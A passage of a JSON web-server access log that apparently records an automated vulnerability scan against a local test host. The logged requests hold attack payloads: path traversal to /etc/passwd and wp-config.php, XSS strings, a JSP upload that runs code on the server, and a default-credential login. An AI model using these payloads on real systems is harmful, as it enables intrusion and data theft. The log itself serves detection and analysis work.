HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"user_name=f47pj&email=f47pj@127.0.0.1&pass1=f47pjvwy&pass2=f47pjvwy&phone=2713155255&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-----------------------------77916619616724262872902741074\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229N5m7Sf7yWm6Kvh64balopVq6D.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0ATest\x0D\x0A-----------------------------77916619616724262872902741074--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BSW_cxttongr.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/project?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/29N5mA00YzQizJWQL3KIQwHCo2F.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"user_mail=f47pj@127.0.0.1&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"name=Admin&password=zabbix&autologin=1&enter=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /s/sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data?get=prodServerGen HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "19/May/2022:06:14:27 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) 